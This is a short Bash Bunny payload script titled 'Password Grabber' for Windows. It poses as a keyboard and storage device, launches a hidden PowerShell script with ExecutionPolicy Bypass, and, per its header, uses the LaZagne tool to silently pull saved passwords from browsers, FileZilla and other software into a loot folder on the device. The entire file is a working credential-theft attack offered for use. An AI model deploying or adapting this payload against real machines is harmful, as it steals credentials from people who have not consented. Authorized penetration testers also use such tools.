#!/bin/bash
#
# Title:         Password Grabber
# Description:   Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... 
#                This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. 
#                This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
# Author:        jdebetaz
# Props:         Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade
# Version:       1.1
# Category:      Credentials
# Target:        Windows
# Attackmodes:   HID, STORAGE

# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE

######## MAKE LOOT DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR

######## ATTACK ########
LED ATTACK
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
# Wait until passwords are grabbed.
sleep 10

######## FINISH ########
LED FINISH